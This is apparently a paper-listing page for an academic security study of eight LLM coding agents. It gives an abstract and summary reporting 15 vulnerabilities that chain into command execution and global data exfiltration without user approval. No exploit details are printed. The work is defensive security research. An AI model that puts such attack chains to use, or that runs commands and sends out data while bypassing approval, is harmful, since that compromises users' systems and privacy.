Takedown: How It's Done in Modern Coding Agent Exploits

📅 2025-09-28
📈 Citations: 0
Influential: 0
📄 PDF
🤖 AI Summary
This work presents the first end-to-end security assessment of eight mainstream LLM-powered coding agents, identifying 15 exploitable vulnerabilities across core components—including task parsing, code generation, and execution environments. Methodologically, we integrate dynamic analysis, static code review, and attack-chain modeling to uncover compound security flaws, with particular emphasis on systemic risks arising from insecure inter-component interactions. Our evaluation reveals that five agents suffer from remote command execution vulnerabilities requiring no user interaction, while four enable unauthorized exfiltration of globally sensitive data. Beyond empirically exposing critical security gaps in current coding agents—hitherto unaddressed in the literature—this study introduces the first structured security assessment framework specifically designed for programming agents. The framework provides both theoretical foundations and practical guidelines for developing trustworthy LLM-based software development systems.

Technology Category

Application Category

📝 Abstract
Coding agents, which are LLM-driven agents specialized in software development, have become increasingly prevalent in modern programming environments. Unlike traditional AI coding assistants, which offer simple code completion and suggestions, modern coding agents tackle more complex tasks with greater autonomy, such as generating entire programs from natural language instructions. To enable such capabilities, modern coding agents incorporate extensive functionalities, which in turn raise significant concerns over their security and privacy. Despite their growing adoption, systematic and in-depth security analysis of these agents has largely been overlooked. In this paper, we present a comprehensive security analysis of eight real-world coding agents. Our analysis addresses the limitations of prior approaches, which were often fragmented and ad hoc, by systematically examining the internal workflows of coding agents and identifying security threats across their components. Through the analysis, we identify 15 security issues, including previously overlooked or missed issues, that can be abused to compromise the confidentiality and integrity of user systems. Furthermore, we show that these security issues are not merely individual vulnerabilities, but can collectively lead to end-to-end exploitations. By leveraging these security issues, we successfully achieved arbitrary command execution in five agents and global data exfiltration in four agents, all without any user interaction or approval. Our findings highlight the need for a comprehensive security analysis in modern LLM-driven agents and demonstrate how insufficient security considerations can lead to severe vulnerabilities.
Problem

Research questions and friction points this paper is trying to address.

Analyzing security vulnerabilities in modern LLM-driven coding agents
Identifying threats compromising user system confidentiality and integrity
Demonstrating end-to-end exploitations enabling unauthorized command execution
Innovation

Methods, ideas, or system contributions that make the work stand out.

Systematically analyzed internal workflows of coding agents
Identified security threats across multiple agent components
Achieved exploitation without user interaction or approval
🔎 Similar Papers
No similar papers found.
E
Eunkyu Lee
KAIST, Daejeon, Republic of Korea
D
Donghyeon Kim
KAIST, Daejeon, Republic of Korea
W
Wonyoung Kim
KAIST, Daejeon, Republic of Korea
Insu Yun
Insu Yun
KAIST
SecuritySystems